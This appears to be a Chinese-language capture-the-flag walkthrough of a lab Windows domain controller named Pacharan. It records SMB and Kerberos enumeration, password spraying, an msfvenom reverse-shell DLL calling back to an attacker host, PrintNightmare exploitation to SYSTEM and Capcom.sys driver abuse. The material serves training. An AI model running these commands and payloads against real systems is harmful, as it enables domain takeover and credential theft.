┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# fscan -h 192.168.69.69
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| ''__/ _ |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.69.69:445 open
192.168.69.69:88 open
192.168.69.69:139 open
192.168.69.69:135 open
[*] alive ports len is: 4
start vulscan
[*] NetBios 192.168.69.69 [+] DC:PACHARAN\WIN-VRU3GG3DPLJ
[*] NetInfo
[*]192.168.69.69
[->]WIN-VRU3GG3DPLJ
[->]192.168.69.69
已完成 4/4
[*] 扫描结束,耗时: 1.128075052s
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# nmap -sC -sV 192.168.69.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 14:51 CST
Nmap scan report for 192.168.69.69
Host is up (0.00014s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-04 13:51:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
MAC Address: 08:00:27:7A:01:8C (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m57s
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:7a:01:8c (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-04T13:51:20
|_ start_date: 2024-12-04T13:48:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.06 seconds
域名 PACHARAN.THL
配一下hsots
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbmap -u anonymous -H 192.168.69.69
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.69.69:445 Name: PACHARAN.THL Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON NO ACCESS Recurso compartido del servidor de inicio de sesión
NETLOGON2 READ ONLY
PACHARAN NO ACCESS
PDF Pro Virtual Printer NO ACCESS Soy Hacker y arreglo impresoras
print$ NO ACCESS Controladores de impresora
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
Users NO ACCESS
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbclient -U anonymous //192.168.69.69/NETLOGON2
Password for [WORKGROUP\anonymous]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 1 01:25:34 2024
.. D 0 Thu Aug 1 01:25:34 2024
Orujo.txt A 22 Thu Aug 1 01:25:55 2024
7735807 blocks of size 4096. 4713743 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (10.7 KiloBytes/sec) (average 10.7 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat Orujo.txt
Pericodelospalotes6969
获取到两个关键字符串
Pericodelospalotes6969
Orujo
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# kerbrute userenum -d PACHARAN.THL --dc 192.168.69.69 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/04/24 - Ronnie Flathers @ropnop
2024/12/04 15:01:42 > Using KDC(s):
2024/12/04 15:01:42 > 192.168.69.69:88
2024/12/04 15:01:42 > [+] VALID USERNAME: chivas@PACHARAN.THL
2024/12/04 15:01:44 > [+] VALID USERNAME: hendrick@PACHARAN.THL
2024/12/04 15:01:44 > [+] VALID USERNAME: whisky@PACHARAN.THL
2024/12/04 15:01:44 > [+] VALID USERNAME: gordons@PACHARAN.THL
2024/12/04 15:01:46 > [+] VALID USERNAME: redlabel@PACHARAN.THL
2024/12/04 15:01:47 > [+] VALID USERNAME: beefeater@PACHARAN.THL
2024/12/04 15:01:47 > [+] VALID USERNAME: Chivas@PACHARAN.THL
2024/12/04 15:01:49 > [+] VALID USERNAME: invitado@PACHARAN.THL
2024/12/04 15:02:06 > [+] VALID USERNAME: administrador@PACHARAN.THL
2024/12/04 15:06:35 > [+] VALID USERNAME: carlosv@PACHARAN.THL
2024/12/04 15:07:19 > [+] VALID USERNAME: Whisky@PACHARAN.THL
2024/12/04 15:07:26 > [+] VALID USERNAME: RedLabel@PACHARAN.THL
2024/12/04 15:07:41 > [+] VALID USERNAME: GordonS@PACHARAN.THL
2024/12/04 15:07:42 > [+] VALID USERNAME: GINEBRA@PACHARAN.THL
2024/12/04 15:07:48 > [+] VALID USERNAME: CarlosV@PACHARAN.THL
2024/12/04 15:07:49 > [+] VALID USERNAME: CHIVAS@PACHARAN.THL
2024/12/04 15:07:50 > [+] VALID USERNAME: Beefeater@PACHARAN.THL
2024/12/04 15:08:03 > Done! Tested 8295455 usernames (17 valid) in 380.478 seconds
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat kerbrute_users.txt|cut -d ' ' -f14|cut -d '@' -f1>valid_users.txt
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat valid_users.txt
chivas
hendrick
whisky
gordons
redlabel
beefeater
Chivas
invitado
administrador
carlosv
Whisky
RedLabel
GordonS
GINEBRA
CarlosV
CHIVAS
Beefeater
把上面获取到的字符串也加进去 Pericodelospalotes6969 Orujo
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u valid_users.txt -p valid_users.txt --continue-on-success
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:chivas
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:hendrick
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:whisky
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:gordons
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:redlabel
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:beefeater
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Chivas
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:invitado
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:administrador
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:carlosv
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Whisky
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:RedLabel
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:GordonS
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:GINEBRA
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:CarlosV
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:CHIVAS
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Beefeater
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Pericodelospalotes6969
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Orujo
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:chivas STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:hendrick STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:whisky STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:gordons STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:redlabel STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:beefeater STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:Chivas STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:invitado STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:administrador STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:carlosv STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:Whisky STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:RedLabel STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:GordonS STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:GINEBRA STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:CarlosV STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:CHIVAS STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:Beefeater STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Orujo:Pericodelospalotes6969
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:Orujo STATUS_LOGON_FAILURE
可以看到 Pericodelospalotes6969 用户是不需要密码的
尝试利用 evil-winrm 登录该用户
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u Pericodelospalotes6969 -p Per
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
失败了
还有一个用户
Orujo :Pericodelospalotes6969
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u Orujo -p Pericodelospalotes6969
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
好吧也不行
看一下Orujo用户的smb共享
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbmap -u Orujo -p Pericodelospalotes6969 -H 192.168.69.69
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.69.69:445 Name: PACHARAN.THL Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
NETLOGON2 NO ACCESS
PACHARAN READ ONLY
PDF Pro Virtual Printer NO ACCESS Soy Hacker y arreglo impresoras
print$ NO ACCESS Controladores de impresora
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
Users NO ACCESS
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbclient -U Orujo //192.168.69.69/PACHARAN
Password for [WORKGROUP\Orujo]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 1 01:21:13 2024
.. D 0 Thu Aug 1 01:21:13 2024
ah.txt A 921 Thu Aug 1 01:20:16 2024
7735807 blocks of size 4096. 4712894 blocks available
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat ah.txt
Mamasoystreamer1!
Mamasoystreamer2@
Mamasoystreamer3#
Mamasoystreamer4$
Mamasoystreamer5%
Mamasoystreamer6^
Mamasoystreamer7&
Mamasoystreamer8*
Mamasoystreamer9(
Mamasoystreamer10)
MamasoyStreamer11!
MamasoyStreamer12@
MamasoyStreamer13#
MamasoyStreamer14$
MamasoyStreamer15%
MamasoyStreamer16^
MamasoyStreamer17&
MamasoyStreamer18*
MamasoyStreamer19(
MamasoyStreamer20)
MamaSoyStreamer1!
MamaSoyStreamer2@
MamaSoyStreamer3#
MamaSoyStreamer4$
MamaSoyStreamer5%
MamaSoyStreamer6^
MamaSoyStreamer7&
MamaSoyStreamer8*
MamaSoyStreamer9(
MamaSoyStreamer10)
MamasoyStream1er!
MamasoyStream2er@
MamasoyStream3er#
MamasoyStream4er$
MamasoyStream5er%
MamasoyStream6er^
MamasoyStream7er&
MamasoyStream8er*
MamasoyStream9er(
MamasoyStream10er)
MamasoyStr1amer!
MamasoyStr2amer@
MamasoyStr3amer#
MamasoyStr4amer$
MamasoyStr5amer%
MamasoyStr6amer^
MamasoyStr7amer&
MamasoyStr8amer*
MamasoyStr9amer(
MamasoyStr10amer)
Mamasoystreamer1
看这像是一个密码表
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u valid_users.txt -p ah.txt --continue-on-success |grep +
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\whisky:MamasoyStream2er@
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Whisky:MamasoyStream2er@
成功获取到了 Whisky 用户的密码
尝试evil -winrm登录
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u 'Whisky' -p 'MamasoyStream2er@'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
又失败了
才看下 Whisky 用户的smb共享
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbmap -u Whisky -p MamasoyStream2er@ -H 192.168.69.69
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[/] Auth[!] Unable to remove test file at \\192.168.69.69\PDF Pro Virtual Printer\LBJIFVWHAS.txt, please remove manually
[+] IP: 192.168.69.69:445 Name: PACHARAN.THL Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
NETLOGON2 NO ACCESS
PACHARAN NO ACCESS
PDF Pro Virtual Printer NO ACCESS Soy Hacker y arreglo impresoras
print$ NO ACCESS Controladores de impresora
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
Users NO ACCESS
没有啥东西啊
利用 Whisky 用户的权限进行 rid-brute 收集域内用户
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u Whisky -p MamasoyStream2er@ --rid-brute >rid-brute.txt
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# wc -l rid-brute.txt
40 rid-brute.txt
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat rid-brute.txt |grep SidTypeUser |cut -d ' ' -f21|cut -d '\' -f2 >valid_users.txt
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat valid_users.txt
Administrador
Invitado
krbtgt
DefaultAccount
WIN-VRU3GG3DPLJ$
Orujo
Ginebra
Whisky
Hendrick
Chivas
Whisky2
JB
Chivas
beefeater
CarlosV
RedLabel
Gordons
查看打印机
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumprinters'
flags:[0x800000]
name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
comment:[Soy Hacker y arreglo impresoras]
获取到一个密码 TurkisArrusPuchuchuSiu1
密码喷涂试试
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u valid_users.txt -p TurkisArrusPuchuchuSiu1 --continue-on-success |grep +
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1
Evil-winrm登录
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u 'Chivas Regal' -p 'TurkisArrusPuchuchuSiu1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
在利用smb检测时我们看到存在一台打印机,那我们可以尝试利用相关漏洞
CVE-2021-34527 也叫 PrintNightmare漏洞
利用脚本 https://github.com/JohnHammond/CVE-2021-34527
这里只是wp 我直接讲如何做
先检查一下打印机相关的协议是否运行
┌──(kali㉿kali)-[~/thl/Pacharan]
└─$ impacket-rpcdump @192.168.69.69 | grep -E 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
很好 这两个协议都在运行
然后用msf生成一个反向dll 然后上传上去
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.69.3 lport=4455 -f dll -o reverse.dll
复制到一个windows下默认可写的目录下。具体的可以看这里https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> cp reverse.dll C:\Windows\Tasks\reverse.dll
加载漏洞利用模块 然后执行dll 反弹shell
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/CVE-2021-34527.ps1
Info: Uploading /home/kali/thl/Pacharan/CVE-2021-34527.ps1 to C:\Users\Chivas Regal\Documents\CVE-2021-34527.ps
Data: 238084 bytes of 238084 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> ls
Directorio: C:\Users\Chivas Regal\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/4/2024 3:53 PM 295936 6666.exe
-a---- 12/4/2024 8:42 PM 178563 CVE-2021-34527.ps1
-a---- 12/4/2024 8:26 PM 9216 reverse.dll
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Import-Module .\CVE-2021-34527.ps1
nc -lvnp 4455
Invoke-Nightmare -DLL 'C:\Windows\Tasks\reverse.dll'
然后就可以获取到系统用户的shell了
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# nc -lvnp 4455
listening on [any] 4455 ...
connect to [192.168.69.3] from (UNKNOWN) [192.168.69.69] 49194
Microsoft Windows [Versi▒n 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
c:\Users\Chivas Regal\Desktop>type user.txt
type user.txt
bb8b4df8eda73e75ca51ca88a909c1cb -
c:\Users\Administrador\Desktop>type root.txt
type root.txt
cfa7cb1cc20e26c0428f9222d44c76a0 -
查看权限时可以看到我们有 SeLoadDriverPrivilege权限
该权限允许用户或进程在系统上加载和卸载设备驱动程序。
通常,只有管理员或受信任的系统进程才会被授予此权限
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= =============================================== ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeLoadDriverPrivilege Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
然后可以从这里 获取到漏洞利用的相关工具
上传相关工具:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/ExploitCapcom.exe
Info: Uploading /home/kali/thl/Pacharan/ExploitCapcom.exe to C:\Users\Chivas Regal\Documents\ExploitCapcom.exe
Data: 387752 bytes of 387752 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/eoploaddriver_x64.exe
Info: Uploading /home/kali/thl/Pacharan/eoploaddriver_x64.exe to C:\Users\Chivas Regal\Documents\eoploaddriver_x64.exe
Data: 92840 bytes of 92840 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/Capcom.sys
Info: Uploading /home/kali/thl/Pacharan/Capcom.sys to C:\Users\Chivas Regal\Documents\Capcom.sys
Data: 14100 bytes of 14100 bytes copied
Info: Upload successful!
加载恶意驱动程序:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> .\ExploitCapcom.exe LOAD c:\windows\tasks\Capcom.sys
[*] Service Name: drlynhqu
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\?????????????????
NTSTATUS: 00000000, WinError: 0
漏洞利用 特权用户执行命令
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> .\ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 00000239224D0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system